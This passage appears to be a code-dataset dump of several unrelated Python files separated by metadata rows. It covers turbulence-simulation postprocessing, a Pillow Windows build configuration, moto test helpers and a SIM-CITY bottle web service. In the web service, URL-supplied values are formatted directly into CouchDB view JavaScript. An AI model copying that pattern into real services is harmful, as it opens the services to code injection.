return h5py.File(self.get_particle_file_name(), 'r')
def get_postprocess_file_name(self):
return os.path.join(self.work_dir, self.simname + '_postprocess.h5')
def get_postprocess_file(self):
return h5py.File(self.get_postprocess_file_name(), 'r')
def compute_statistics(self, iter0 = 0, iter1 = None):
"""Run basic postprocessing on raw data.
The energy spectrum :math:`E(t, k)` and the enstrophy spectrum
:math:`\\frac{1}{2}\omega^2(t, k)` are computed from the
.. math::
\sum_{k \\leq \\|\\mathbf{k}\\| \\leq k+dk}\\hat{u_i} \\hat{u_j}^*, \\hskip .5cm
\sum_{k \\leq \\|\\mathbf{k}\\| \\leq k+dk}\\hat{\omega_i} \\hat{\\omega_j}^*
tensors, and the enstrophy spectrum is also used to
compute the dissipation :math:`\\varepsilon(t)`.
These basic quantities are stored in a newly created HDF5 file,
``simname_postprocess.h5``.
"""
if len(list(self.statistics.keys())) > 0:
return None
self.read_parameters()
with self.get_data_file() as data_file:
if 'moments' not in data_file['statistics'].keys():
return None
iter0 = min((data_file['statistics/moments/velocity'].shape[0] *
self.parameters['niter_stat']-1),
iter0)
if type(iter1) == type(None):
iter1 = data_file['iteration'].value
else:
iter1 = min(data_file['iteration'].value, iter1)
ii0 = iter0 // self.parameters['niter_stat']
ii1 = iter1 // self.parameters['niter_stat']
self.statistics['kshell'] = data_file['kspace/kshell'].value
self.statistics['kM'] = data_file['kspace/kM'].value
self.statistics['dk'] = data_file['kspace/dk'].value
computation_needed = True
pp_file = h5py.File(self.get_postprocess_file_name(), 'a')
if 'ii0' in pp_file.keys():
computation_needed = not (ii0 == pp_file['ii0'].value and
ii1 == pp_file['ii1'].value)
if computation_needed:
for k in pp_file.keys():
del pp_file[k]
if computation_needed:
pp_file['iter0'] = iter0
pp_file['iter1'] = iter1
pp_file['ii0'] = ii0
pp_file['ii1'] = ii1
pp_file['t'] = (self.parameters['dt']*
self.parameters['niter_stat']*
(np.arange(ii0, ii1+1).astype(np.float)))
pp_file['energy(t, k)'] = (
data_file['statistics/spectra/velocity_velocity'][ii0:ii1+1, :, 0, 0] +
data_file['statistics/spectra/velocity_velocity'][ii0:ii1+1, :, 1, 1] +
data_file['statistics/spectra/velocity_velocity'][ii0:ii1+1, :, 2, 2])/2
pp_file['enstrophy(t, k)'] = (
data_file['statistics/spectra/vorticity_vorticity'][ii0:ii1+1, :, 0, 0] +
data_file['statistics/spectra/vorticity_vorticity'][ii0:ii1+1, :, 1, 1] +
data_file['statistics/spectra/vorticity_vorticity'][ii0:ii1+1, :, 2, 2])/2
pp_file['vel_max(t)'] = data_file['statistics/moments/velocity'] [ii0:ii1+1, 9, 3]
pp_file['renergy(t)'] = data_file['statistics/moments/velocity'][ii0:ii1+1, 2, 3]/2
for k in ['t',
'energy(t, k)',
'enstrophy(t, k)',
'vel_max(t)',
'renergy(t)']:
if k in pp_file.keys():
self.statistics[k] = pp_file[k].value
self.compute_time_averages()
return None
def compute_time_averages(self):
"""Compute easy stats.
Further computation of statistics based on the contents of
``simname_postprocess.h5``.
Standard quantities are as follows
(consistent with [Ishihara]_):
.. math::
U_{\\textrm{int}}(t) = \\sqrt{\\frac{2E(t)}{3}}, \\hskip .5cm
L_{\\textrm{int}}(t) = \\frac{\pi}{2U_{int}^2(t)} \\int \\frac{dk}{k} E(t, k), \\hskip .5cm
T_{\\textrm{int}}(t) =
\\frac{L_{\\textrm{int}}(t)}{U_{\\textrm{int}}(t)}
\\eta_K = \\left(\\frac{\\nu^3}{\\varepsilon}\\right)^{1/4}, \\hskip .5cm
\\tau_K = \\left(\\frac{\\nu}{\\varepsilon}\\right)^{1/2}, \\hskip .5cm
\\lambda = \\sqrt{\\frac{15 \\nu U_{\\textrm{int}}^2}{\\varepsilon}}
Re = \\frac{U_{\\textrm{int}} L_{\\textrm{int}}}{\\nu}, \\hskip
.5cm
R_{\\lambda} = \\frac{U_{\\textrm{int}} \\lambda}{\\nu}
.. [Ishihara] T. Ishihara et al,
*Small-scale statistics in high-resolution direct numerical
simulation of turbulence: Reynolds number dependence of
one-point velocity gradient statistics*.
J. Fluid Mech.,
**592**, 335-366, 2007
"""
for key in ['energy', 'enstrophy']:
self.statistics[key + '(t)'] = (self.statistics['dk'] *
np.sum(self.statistics[key + '(t, k)'], axis = 1))
self.statistics['Uint(t)'] = np.sqrt(2*self.statistics['energy(t)'] / 3)
self.statistics['Lint(t)'] = ((self.statistics['dk']*np.pi /
(2*self.statistics['Uint(t)']**2)) *
np.nansum(self.statistics['energy(t, k)'] /
self.statistics['kshell'][None, :], axis = 1))
for key in ['energy',
'enstrophy',
'vel_max',
'Uint',
'Lint']:
if key + '(t)' in self.statistics.keys():
self.statistics[key] = np.average(self.statistics[key + '(t)'], axis = 0)
for suffix in ['', '(t)']:
self.statistics['diss' + suffix] = (self.parameters['nu'] *
self.statistics['enstrophy' + suffix]*2)
self.statistics['etaK' + suffix] = (self.parameters['nu']**3 /
self.statistics['diss' + suffix])**.25
self.statistics['tauK' + suffix] = (self.parameters['nu'] /
self.statistics['diss' + suffix])**.5
self.statistics['Re' + suffix] = (self.statistics['Uint' + suffix] *
self.statistics['Lint' + suffix] /
self.parameters['nu'])
self.statistics['lambda' + suffix] = (15 * self.parameters['nu'] *
self.statistics['Uint' + suffix]**2 /
self.statistics['diss' + suffix])**.5
self.statistics['Rlambda' + suffix] = (self.statistics['Uint' + suffix] *
self.statistics['lambda' + suffix] /
self.parameters['nu'])
self.statistics['kMeta' + suffix] = (self.statistics['kM'] *
self.statistics['etaK' + suffix])
if self.parameters['dealias_type'] == 1:
self.statistics['kMeta' + suffix] *= 0.8
self.statistics['Tint'] = self.statistics['Lint'] / self.statistics['Uint']
self.statistics['Taylor_microscale'] = self.statistics['lambda']
return None
def set_plt_style(
self,
style = {'dashes' : (None, None)}):
self.style.update(style)
return None
def convert_complex_from_binary(
self,
field_name = 'vorticity',
iteration = 0,
file_name = None):
"""read the Fourier representation of a vector field.
Read the binary file containing iteration ``iteration`` of the
field ``field_name``, and write it in a ``.h5`` file.
"""
data = np.memmap(
os.path.join(self.work_dir,
self.simname + '_{0}_i{1:0>5x}'.format('c' + field_name, iteration)),
dtype = self.ctype,
mode = 'r',
shape = (self.parameters['ny'],
self.parameters['nz'],
self.parameters['nx']//2+1,
3))
if type(file_name) == type(None):
file_name = self.simname + '_{0}_i{1:0>5x}.h5'.format('c' + field_name, iteration)
file_name = os.path.join(self.work_dir, file_name)
f = h5py.File(file_name, 'a')
f[field_name + '/complex/{0}'.format(iteration)] = data
f.close()
return None
def job_parser_arguments(
self,
parser):
parser.add_argument(
'--ncpu',
type = int,
dest = 'ncpu',
default = -1)
parser.add_argument(
'--np', '--nprocesses',
metavar = 'NPROCESSES',
help = 'number of mpi processes to use',
type = int,
dest = 'nb_processes',
default = 4)
parser.add_argument(
'--ntpp', '--nthreads-per-process',
type = int,
dest = 'nb_threads_per_process',
metavar = 'NTHREADS_PER_PROCESS',
help = 'number of threads to use per MPI process',
default = 1)
parser.add_argument(
'--no-submit',
action = 'store_true',
dest = 'no_submit')
parser.add_argument(
'--environment',
type = str,
dest = 'environment',
default = None)
parser.add_argument(
'--minutes',
type = int,
dest = 'minutes',
default = 5,
help = 'If environment supports it, this is the requested wall-clock-limit.')
parser.add_argument(
'--njobs',
type = int, dest = 'njobs',
default = 1)
return None
def simulation_parser_arguments(
self,
parser):
parser.add_argument(
'--simname',
type = str, dest = 'simname',
default = 'test')
parser.add_argument(
'--wd',
type = str, dest = 'work_dir',
default = './')
parser.add_argument(
'--precision',
choices = ['single', 'double'],
type = str,
default = 'single')
parser.add_argument(
'--iter0',
type = int,
dest = 'iter0',
default = 0)
parser.add_argument(
'--iter1',
type = int,
dest = 'iter1',
default = 0)
return None
def particle_parser_arguments(
self,
parser):
parser.add_argument(
'--particle-rand-seed',
type = int,
dest = 'particle_rand_seed',
default = None)
parser.add_argument(
'--pclouds',
type = int,
dest = 'pclouds',
default = 1,
help = ('number of particle clouds. Particle "clouds" '
'consist of particles distributed according to '
'pcloud-type.'))
parser.add_argument(
'--pcloud-type',
choices = ['random-cube',
'regular-cube'],
dest = 'pcloud_type',
default = 'random-cube')
parser.add_argument(
'--particle-cloud-size',
type = float,
dest = 'particle_cloud_size',
default = 2*np.pi)
return None
def add_parser_arguments(
self,
parser):
subparsers = parser.add_subparsers(
dest = 'DNS_class',
help = 'type of simulation to run')
subparsers.required = True
parser_native_binary_to_hdf5 = subparsers.add_parser(
'native_binary_to_hdf5',
help = 'convert native binary to hdf5')
self.simulation_parser_arguments(parser_native_binary_to_hdf5)
self.job_parser_arguments(parser_native_binary_to_hdf5)
self.parameters_to_parser_arguments(parser_native_binary_to_hdf5)
parser_get_rfields = subparsers.add_parser(
'get_rfields',
help = 'get real space velocity field')
self.simulation_parser_arguments(parser_get_rfields)
self.job_parser_arguments(parser_get_rfields)
self.parameters_to_parser_arguments(parser_get_rfields)
parser_joint_acc_vel_stats = subparsers.add_parser(
'joint_acc_vel_stats',
help = 'get joint acceleration and velocity statistics')
self.simulation_parser_arguments(parser_joint_acc_vel_stats)
self.job_parser_arguments(parser_joint_acc_vel_stats)
self.parameters_to_parser_arguments(parser_joint_acc_vel_stats)
self.parameters_to_parser_arguments(
parser_joint_acc_vel_stats,
parameters = self.extra_postprocessing_parameters('joint_acc_vel_stats'))
return None
def prepare_launch(
self,
args = []):
"""Set up reasonable parameters.
With the default Lundgren forcing applied in the band [2, 4],
we can estimate the dissipation, therefore we can estimate
:math:`k_M \\eta_K` and constrain the viscosity.
In brief, the command line parameter :math:`k_M \\eta_K` is
used in the following formula for :math:`\\nu` (:math:`N` is the
number of real space grid points per coordinate):
.. math::
\\nu = \\left(\\frac{2 k_M \\eta_K}{N} \\right)^{4/3}
With this choice, the average dissipation :math:`\\varepsilon`
will be close to 0.4, and the integral scale velocity will be
close to 0.77, yielding the approximate value for the Taylor
microscale and corresponding Reynolds number:
.. math::
\\lambda \\approx 4.75\\left(\\frac{2 k_M \\eta_K}{N} \\right)^{4/6}, \\hskip .5in
R_\\lambda \\approx 3.7 \\left(\\frac{N}{2 k_M \\eta_K} \\right)^{4/6}
"""
opt = _code.prepare_launch(self, args = args)
self.set_precision(opt.precision)
self.dns_type = opt.DNS_class
self.name = self.dns_type + '-' + self.fluid_precision + '-v' + bfps.__version__
# merge parameters if needed
for k in self.pp_parameters.keys():
self.parameters[k] = self.pp_parameters[k]
self.pars_from_namespace(opt)
niter_out = self.get_data_file()['parameters/niter_out'].value
assert(opt.iter0 % niter_out == 0)
self.pp_parameters['iteration_list'] = np.arange(
opt.iter0, opt.iter1+niter_out, niter_out, dtype = np.int)
return opt
def launch(
self,
args = [],
**kwargs):
opt = self.prepare_launch(args = args)
self.launch_jobs(opt = opt, **kwargs)
return None
def get_checkpoint_0_fname(self):
return os.path.join(
self.work_dir,
self.simname + '_checkpoint_0.h5')
def generate_tracer_state(
self,
rseed = None,
species = 0):
with h5py.File(self.get_checkpoint_0_fname(), 'a') as data_file:
dset = data_file[
'tracers{0}/state/0'.format(species)]
if not type(rseed) == type(None):
np.random.seed(rseed)
nn = self.parameters['nparticles']
cc = int(0)
batch_size = int(1e6)
while nn > 0:
if nn > batch_size:
dset[cc*batch_size:(cc+1)*batch_size] = np.random.random(
(batch_size, 3))*2*np.pi
nn -= batch_size
else:
dset[cc*batch_size:cc*batch_size+nn] = np.random.random(
(nn, 3))*2*np.pi
nn = 0
cc += 1
return None
def generate_vector_field(
self,
rseed = 7547,
spectra_slope = 1.,
amplitude = 1.,
iteration = 0,
field_name = 'vorticity',
write_to_file = False,
# to switch to constant field, use generate_data_3D_uniform
# for scalar_generator
scalar_generator = tools.generate_data_3D):
"""generate vector field.
The generated field is not divergence free, but it has the proper
shape.
:param rseed: seed for random number generator
:param spectra_slope: spectrum of field will look like k^(-p)
:param amplitude: all amplitudes are multiplied with this value
:param iteration: the field is written at this iteration
:param field_name: the name of the field being generated
:param write_to_file: should we write the field to file?
:param scalar_generator: which function to use for generating the
individual components.
Possible values: bfps.tools.generate_data_3D,
bfps.tools.generate_data_3D_uniform
:type rseed: int
:type spectra_slope: float
:type amplitude: float
:type iteration: int
:type field_name: str
:type write_to_file: bool
:type scalar_generator: function
:returns: ``Kdata``, a complex valued 4D ``numpy.array`` that uses the
transposed FFTW layout.
Kdata[ky, kz, kx, i] is the amplitude of mode (kx, ky, kz) for
the i-th component of the field.
(i.e. x is the fastest index and z the slowest index in the
real-space representation).
"""
np.random.seed(rseed)
Kdata00 = scalar_generator(
self.parameters['nz']//2,
self.parameters['ny']//2,
self.parameters['nx']//2,
p = spectra_slope,
amplitude = amplitude).astype(self.ctype)
Kdata01 = scalar_generator(
self.parameters['nz']//2,
self.parameters['ny']//2,
self.parameters['nx']//2,
p = spectra_slope,
amplitude = amplitude).astype(self.ctype)
Kdata02 = scalar_generator(
self.parameters['nz']//2,
self.parameters['ny']//2,
self.parameters['nx']//2,
p = spectra_slope,
amplitude = amplitude).astype(self.ctype)
Kdata0 = np.zeros(
Kdata00.shape + (3,),
Kdata00.dtype)
Kdata0[..., 0] = Kdata00
Kdata0[..., 1] = Kdata01
Kdata0[..., 2] = Kdata02
Kdata1 = tools.padd_with_zeros(
Kdata0,
self.parameters['nz'],
self.parameters['ny'],
self.parameters['nx'])
if write_to_file:
Kdata1.tofile(
os.path.join(self.work_dir,
self.simname + "_c{0}_i{1:0>5x}".format(field_name, iteration)))
return Kdata1
def copy_complex_field(
self,
src_file_name,
src_dset_name,
dst_file,
dst_dset_name,
make_link = True):
# I define a min_shape thingie, but for now I only trust this method for
# the case of increasing/decreasing by the same factor in all directions.
# in principle we could write something more generic, but i'm not sure
# how complicated that would be
dst_shape = (self.parameters['nz'],
self.parameters['ny'],
(self.parameters['nx']+2) // 2,
3)
src_file = h5py.File(src_file_name, 'r')
if (src_file[src_dset_name].shape == dst_shape):
if make_link and (src_file[src_dset_name].dtype == self.ctype):
dst_file[dst_dset_name] = h5py.ExternalLink(
src_file_name,
src_dset_name)
else:
dst_file.create_dataset(
dst_dset_name,
shape = dst_shape,
dtype = self.ctype,
fillvalue = 0.0)
for kz in range(src_file[src_dset_name].shape[0]):
dst_file[dst_dset_name][kz] = src_file[src_dset_name][kz]
else:
print('aloha')
min_shape = (min(dst_shape[0], src_file[src_dset_name].shape[0]),
min(dst_shape[1], src_file[src_dset_name].shape[1]),
min(dst_shape[2], src_file[src_dset_name].shape[2]),
3)
print(self.ctype)
dst_file.create_dataset(
dst_dset_name,
shape = dst_shape,
dtype = np.dtype(self.ctype),
fillvalue = complex(0))
for kz in range(min_shape[0]):
dst_file[dst_dset_name][kz,:min_shape[1], :min_shape[2]] = \
src_file[src_dset_name][kz, :min_shape[1], :min_shape[2]]
return None
def prepare_post_file(
self,
opt = None):
self.pp_parameters.update(
self.extra_postprocessing_parameters(self.dns_type))
self.pars_from_namespace(
opt,
parameters = self.pp_parameters,
get_sim_info = False)
for kk in ['nx', 'ny', 'nz']:
self.parameters[kk] = self.get_data_file()['parameters/' + kk].value
n = self.parameters['nx']
if self.dns_type in ['filtered_slices',
'filtered_acceleration']:
if type(opt.klist_kmax) == type(None):
opt.klist_kmax = n / 3.
if type(opt.klist_kmin) == type(None):
opt.klist_kmin = 6.
kvals = bfps_addons.tools.power_space_array(
power = opt.klist_power,
size = opt.klist_size,
vmin = opt.klist_kmin,
vmax = opt.klist_kmax)
if opt.test_klist:
for i in range(opt.klist_size):
print('kcut{0} = {1}, ell{0} = {2:.3e}'.format(
i, kvals[i], 2*np.pi / kvals[i]))
opt.no_submit = True
self.pp_parameters['kcut'] = kvals
self.rewrite_par(
group = self.dns_type + '/parameters',
parameters = self.pp_parameters,
file_name = os.path.join(self.work_dir, self.simname + '_post.h5'))
histogram_bins = opt.histogram_bins
if (type(histogram_bins) == type(None) and
'histogram_bins' in self.pp_parameters.keys()):
histogram_bins = self.pp_parameters['histogram_bins']
with h5py.File(os.path.join(self.work_dir, self.simname + '_post.h5'), 'r+') as ofile:
group = ofile[self.dns_type]
group.require_group('histograms')
group.require_group('moments')
group.require_group('spectra')
vec_spectra_stats = []
vec4_rspace_stats = []
scal_rspace_stats = []
if self.dns_type == 'joint_acc_vel_stats':
vec_spectra_stats.append('velocity')
vec4_rspace_stats.append('velocity')
vec_spectra_stats.append('acceleration')
vec4_rspace_stats.append('acceleration')
for quantity in scal_rspace_stats:
if quantity not in group['histograms'].keys():
time_chunk = 2**20 // (8*histogram_bins)
time_chunk = max(time_chunk, 1)
group['histograms'].create_dataset(
quantity,
(1, histogram_bins),
chunks = (time_chunk, histogram_bins),
maxshape = (None, histogram_bins),
dtype = np.int64)
else:
assert(histogram_bins ==
group['histograms/' + quantity].shape[1])
if quantity not in group['moments'].keys():
time_chunk = 2**20 // (8*10)
time_chunk = max(time_chunk, 1)
group['moments'].create_dataset(
quantity,
(1, 10),
chunks = (time_chunk, 10),
maxshape = (None, 10),
dtype = np.float64)
if self.dns_type == 'joint_acc_vel_stats':
quantity = 'acceleration_and_velocity_components'
if quantity not in group['histograms'].keys():
time_chunk = 2**20 // (8*9*histogram_bins**2)
time_chunk = max(time_chunk, 1)
group['histograms'].create_dataset(
quantity,
(1, histogram_bins, histogram_bins, 3, 3),
chunks = (time_chunk, histogram_bins, histogram_bins, 3, 3),
maxshape = (None, histogram_bins, histogram_bins, 3, 3),
dtype = np.int64)
quantity = 'acceleration_and_velocity_magnitudes'
if quantity not in group['histograms'].keys():
time_chunk = 2**20 // (8*histogram_bins**2)
time_chunk = max(time_chunk, 1)
group['histograms'].create_dataset(
quantity,
(1, histogram_bins, histogram_bins),
chunks = (time_chunk, histogram_bins, histogram_bins),
maxshape = (None, histogram_bins, histogram_bins),
dtype = np.int64)
ncomps = 4
for quantity in vec4_rspace_stats:
if quantity not in group['histograms'].keys():
time_chunk = 2**20 // (8*histogram_bins*ncomps)
time_chunk = max(time_chunk, 1)
group['histograms'].create_dataset(
quantity,
(1, histogram_bins, ncomps),
chunks = (time_chunk, histogram_bins, ncomps),
maxshape = (None, histogram_bins, ncomps),
dtype = np.int64)
if quantity not in group['moments'].keys():
time_chunk = 2**20 // (8*10*ncomps)
time_chunk = max(time_chunk, 1)
group['moments'].create_dataset(
quantity,
(1, 10, ncomps),
chunks = (time_chunk, 10, ncomps),
maxshape = (None, 10, ncomps),
dtype = np.float64)
time_chunk = 2**20 // (
4*3*
self.parameters['nx']*self.parameters['ny'])
time_chunk = max(time_chunk, 1)
for quantity in vec_spectra_stats:
df = self.get_data_file()
if quantity + '_' + quantity not in group['spectra'].keys():
spec_chunks = df['statistics/spectra/velocity_velocity'].chunks
spec_shape = df['statistics/spectra/velocity_velocity'].shape
spec_maxshape = df['statistics/spectra/velocity_velocity'].maxshape
group['spectra'].create_dataset(
quantity + '_' + quantity,
spec_shape,
chunks = spec_chunks,
maxshape = spec_maxshape,
dtype = np.float64)
df.close()
return None
def prepare_field_file(self):
df = self.get_data_file()
if 'field_dtype' in df.keys():
# we don't need to do anything, raw binary files are used
return None
last_iteration = df['iteration'].value
cppf = df['parameters/checkpoints_per_file'].value
niter_out = df['parameters/niter_out'].value
with h5py.File(os.path.join(self.work_dir, self.simname + '_fields.h5'), 'a') as ff:
ff.require_group('vorticity')
ff.require_group('vorticity/complex')
checkpoint = 0
while True:
cpf_name = os.path.join(
self.work_dir,
self.simname + '_checkpoint_{0}.h5'.format(checkpoint))
if os.path.exists(cpf_name):
cpf = h5py.File(cpf_name, 'r')
for iter_name in cpf['vorticity/complex'].keys():
if iter_name not in ff['vorticity/complex'].keys():
ff['vorticity/complex/' + iter_name] = h5py.ExternalLink(
cpf_name,
'vorticity/complex/' + iter_name)
checkpoint += 1
else:
break
return None
def launch_jobs(
self,
opt = None,
particle_initial_condition = None):
self.prepare_post_file(opt)
self.prepare_field_file()
self.run(
nb_processes = opt.nb_processes,
nb_threads_per_process = opt.nb_threads_per_process,
njobs = opt.njobs,
hours = opt.minutes // 60,
minutes = opt.minutes % 60,
no_submit = opt.no_submit,
err_file = 'err_' + self.dns_type,
out_file = 'out_' + self.dns_type)
return None
| gpl-3.0 | 8,611,814,064,329,809,000 | 44.294621 | 103 | 0.471701 | false | 4.123192 | false | false | false |
mollstam/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Pillow-2.9.0/winbuild/config.py | 2 | 3822 | import os
SF_MIRROR = 'http://iweb.dl.sourceforge.net'
pythons = {#'26': 7,
'27': 7,
#'32': 7,
'33': 7.1,
'34': 7.1}
VIRT_BASE = "c:/vp/"
X64_EXT = os.environ.get('X64_EXT', "x64")
libs = {
'zlib': {
'url': 'http://zlib.net/zlib128.zip',
'hash': 'md5:126f8676442ffbd97884eb4d6f32afb4',
'dir': 'zlib-1.2.8',
},
'jpeg': {
'url': 'http://www.ijg.org/files/jpegsr9a.zip',
'hash': 'md5:a34f3c82760270ee1e1885b15b90a72e', # not found - generated by wiredfool
'dir': 'jpeg-9a',
},
'tiff': {
'url': 'ftp://ftp.remotesensing.org/pub/libtiff/tiff-4.0.4.zip',
'hash': 'md5:8f538a34156188f9a8dcddb679c65d1e',
'dir': 'tiff-4.0.4',
},
'freetype': {
'url': 'http://download.savannah.gnu.org/releases/freetype/freetype-2.6.tar.gz',
'hash': 'md5:1d733ea6c1b7b3df38169fbdbec47d2b',
'dir': 'freetype-2.6',
},
'lcms': {
'url': SF_MIRROR+'/project/lcms/lcms/2.7/lcms2-2.7.zip',
'hash': 'sha1:7ff1a5b721ca719760ba6eb4ec6f38d5e65381cf',
'dir': 'lcms2-2.7',
},
'tcl-8.5': {
'url': SF_MIRROR+'/project/tcl/Tcl/8.5.18/tcl8518-src.zip',
'hash': 'sha1:4c2aed9043088c630a4c795265e2738ef1b4db3b',
'dir': '',
},
'tk-8.5': {
'url': SF_MIRROR+'/project/tcl/Tcl/8.5.18/tk8518-src.zip',
'hash': 'sha1:273f55148777413774aa722ecad25cabda1e31ae',
'dir': '',
'version':'8.5.18',
},
'tcl-8.6': {
'url': SF_MIRROR+'/project/tcl/Tcl/8.6.4/tcl864-src.zip',
'hash': 'md5:35748d2fc61e08a2fdb23b85c6f8c4a0',
'dir': '',
},
'tk-8.6': {
'url': SF_MIRROR+'/project/tcl/Tcl/8.6.4/tk864-src.zip',
'hash': 'md5:111d45061a69e7f5250b6ec8ca7c4f35',
'dir': '',
'version':'8.6.4',
},
'webp': {
'url': 'http://downloads.webmproject.org/releases/webp/libwebp-0.4.3.tar.gz',
'hash': 'sha1:1c307a61c4d0018620b4ba9a58e8f48a8d6640ef',
'dir': 'libwebp-0.4.3',
},
'openjpeg': {
'url': SF_MIRROR+'/project/openjpeg/openjpeg/2.1.0/openjpeg-2.1.0.tar.gz',
'hash': 'md5:f6419fcc233df84f9a81eb36633c6db6',
'dir': 'openjpeg-2.1.0',
},
}
bin_libs = {
'openjpeg': {
'filename': 'openjpeg-2.0.0-win32-x86.zip',
'hash': 'sha1:xxx',
'version': '2.0'
},
}
compilers = {
(7, 64): {
'env_version': 'v7.0',
'vc_version': '2008',
'env_flags': '/x64 /xp',
'inc_dir': 'msvcr90-x64',
'platform': 'x64',
'webp_platform': 'x64',
},
(7, 32): {
'env_version': 'v7.0',
'vc_version': '2008',
'env_flags': '/x86 /xp',
'inc_dir': 'msvcr90-x32',
'platform': 'Win32',
'webp_platform': 'x86',
},
(7.1, 64): {
'env_version': 'v7.1',
'vc_version': '2010',
'env_flags': '/x64 /vista',
'inc_dir': 'msvcr10-x64',
'platform': 'x64',
'webp_platform': 'x64',
},
(7.1, 32): {
'env_version': 'v7.1',
'vc_version': '2010',
'env_flags': '/x86 /vista',
'inc_dir': 'msvcr10-x32',
'platform': 'Win32',
'webp_platform': 'x86',
},
}
def pyversion_fromEnv():
py = os.environ['PYTHON']
py_version = '27'
for k in pythons.keys():
if k in py:
py_version = k
break
if '64' in py:
py_version = '%s%s' % (py_version, X64_EXT)
return py_version
def compiler_fromEnv():
py = os.environ['PYTHON']
for k, v in pythons.items():
if k in py:
compiler_version = v
break
bit = 32
if '64' in py:
bit = 64
return compilers[(compiler_version, bit)]
| mit | 7,292,043,135,636,486,000 | 25.358621 | 93 | 0.502878 | false | 2.489902 | false | false | false |
DataDog/moto | tests/helpers.py | 2 | 1220 | from __future__ import unicode_literals
import boto
import six
from nose.plugins.skip import SkipTest
def version_tuple(v):
return tuple(map(int, (v.split("."))))
# Note: See https://github.com/spulec/moto/issues/201 for why this is a separate method.
def skip_test():
raise SkipTest
class requires_boto_gte(object):
"""Decorator for requiring boto version greater than or equal to 'version'"""
def __init__(self, version):
self.version = version
def __call__(self, test):
boto_version = version_tuple(boto.__version__)
required = version_tuple(self.version)
if boto_version >= required:
return test
return skip_test
class py3_requires_boto_gte(object):
"""Decorator for requiring boto version greater than or equal to 'version'
when running on Python 3. (Not all of boto is Python 3 compatible.)"""
def __init__(self, version):
self.version = version
def __call__(self, test):
if not six.PY3:
return test
boto_version = version_tuple(boto.__version__)
required = version_tuple(self.version)
if boto_version >= required:
return test
return skip_test
| apache-2.0 | 7,139,768,139,323,090,000 | 28.047619 | 88 | 0.639344 | false | 4.080268 | true | false | false |
fieldsofview/sim-city-webservice | scripts/app.py | 1 | 6851 | # SIM-CITY webservice
#
# Copyright 2015 Joris Borgdorff <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gevent import monkey; monkey.patch_all()
from bottle import post, get, run, delete, request, response, HTTPResponse
import simcity
from simcity.util import listfiles
from simcityweb.util import error, get_simulation_config
import simcityexplore
from couchdb.http import ResourceConflict
from picas.documents import Document
config_sim = simcity.get_config().section('Simulations')
couch_cfg = simcity.get_config().section('task-db')
@get('/explore/simulate/<name>/<version>')
def get_simulation_by_name_version(name, version=None):
try:
sim, version = get_simulation_config(name, version, config_sim)
return sim[version]
except HTTPResponse as ex:
return ex
@get('/explore/simulate/<name>')
def get_simulation_by_name(name):
try:
sim, version = get_simulation_config(name, None, config_sim)
return sim
except HTTPResponse as ex:
return ex
@get('/explore')
def explore():
return "API: overview | simulate | job"
@get('/explore/simulate')
def simulate_list():
files = listfiles(config_sim['path'])
return {"simulations": [f[:-5] for f in files if f.endswith('.json')]}
@post('/explore/simulate/<name>/<version>')
def simulate_name_version(name, version=None):
try:
sim, version = get_simulation_config(name, version, config_sim)
sim = sim[version]
query = dict(request.json)
task_id = None
if '_id' in query:
task_id = query['_id']
del query['_id']
params = simcityexplore.parse_parameters(query, sim['parameters'])
except HTTPResponse as ex:
return ex
except ValueError as ex:
return error(400, ex.message)
task_props = {
'name': name,
'ensemble': query['ensemble'],
'command': sim['command'],
'version': version,
'input': params,
}
if task_id is not None:
task_props['_id'] = task_id
try:
token = simcity.add_task(task_props)
except ResourceConflict:
return error(400, "simulation name " + task_id + " already taken")
try:
simcity.submit_if_needed(config_sim['default_host'], 1)
except:
pass # too bad. User can call /explore/job.
response.status = 201 # created
url = '%s%s/%s' % (couch_cfg.get('public_url', couch_cfg['url']), couch_cfg['database'],
token.id)
response.set_header('Location', url)
return token.value
@post('/explore/simulate/<name>')
def simulate_name(name):
return simulate_name_version(name)
@get('/explore/view/totals')
def overview():
try:
return simcity.overview_total()
except:
return error(500, "cannot read overview")
@post('/explore/job')
def submit_job():
return submit_job_to_host(config_sim['default_host'])
@post('/explore/job/<host>')
def submit_job_to_host(host):
try:
job = simcity.submit_if_needed(host, int(config_sim['max_jobs']))
except ValueError:
return error(404, "Host " + host + " unknown")
except IOError:
return error(502, "Cannot connect to host")
else:
if job is None:
response.status = 503 # service temporarily unavailable
else:
response.status = 201 # created
return {key: job[key] for key in ['_id', 'batch_id', 'hostname']}
@get('/explore/view/simulations/<name>/<version>')
def simulations_view(name, version):
sim, version = get_simulation_config(name, version, config_sim)
design_doc = name + '_' + version
doc_id = '_design/' + design_doc
task_db = simcity.get_task_database()
try:
task_db.get(doc_id)
except:
map_fun = """
function(doc) {
if (doc.type === "task" && doc.name === "%s" && doc.version === "%s") {
emit(doc._id, {
"id": doc._id,
"rev": doc._rev,
"ensemble": doc.ensemble,
"url": "%s%s/" + doc._id,
"error": doc.error,
"lock": doc.lock,
"done": doc.done,
"input": doc.input
});
}
}""" % (name, version, '/couchdb/', couch_cfg['database'])
task_db.add_view('all_docs', map_fun, design_doc=design_doc)
url = '%s%s/%s/_view/all_docs' % ('/couchdb/', # couch_cfg['public_url'],
couch_cfg['database'], doc_id)
response.status = 302 # temporary redirect
response.set_header('Location', url)
return
@get('/explore/view/simulations/<name>/<version>/<ensemble>')
def ensemble_view(name, version, ensemble):
sim, version = get_simulation_config(name, version, config_sim)
design_doc = '{}_{}_{}'.format(name, version, ensemble)
doc_id = '_design/' + design_doc
task_db = simcity.get_task_database()
try:
task_db.get(doc_id)
except:
map_fun = """
function(doc) {
if (doc.type === "task" && doc.name === "%s" && doc.version === "%s" && doc.ensemble === "%s") {
emit(doc._id, {
"id": doc._id,
"rev": doc._rev,
"url": "%s%s/" + doc._id,
"error": doc.error,
"lock": doc.lock,
"done": doc.done,
"input": doc.input
});
}
}""" % (name, version, ensemble, '/couchdb/', couch_cfg['database'])
task_db.add_view('all_docs', map_fun, design_doc=design_doc)
url = '%s%s/%s/_view/all_docs' % ('/couchdb/', # couch_cfg['public_url'],
couch_cfg['database'], doc_id)
response.status = 302 # temporary redirect
response.set_header('Location', url)
return
@get('/explore/simulation/<id>')
def get_simulation(id):
try:
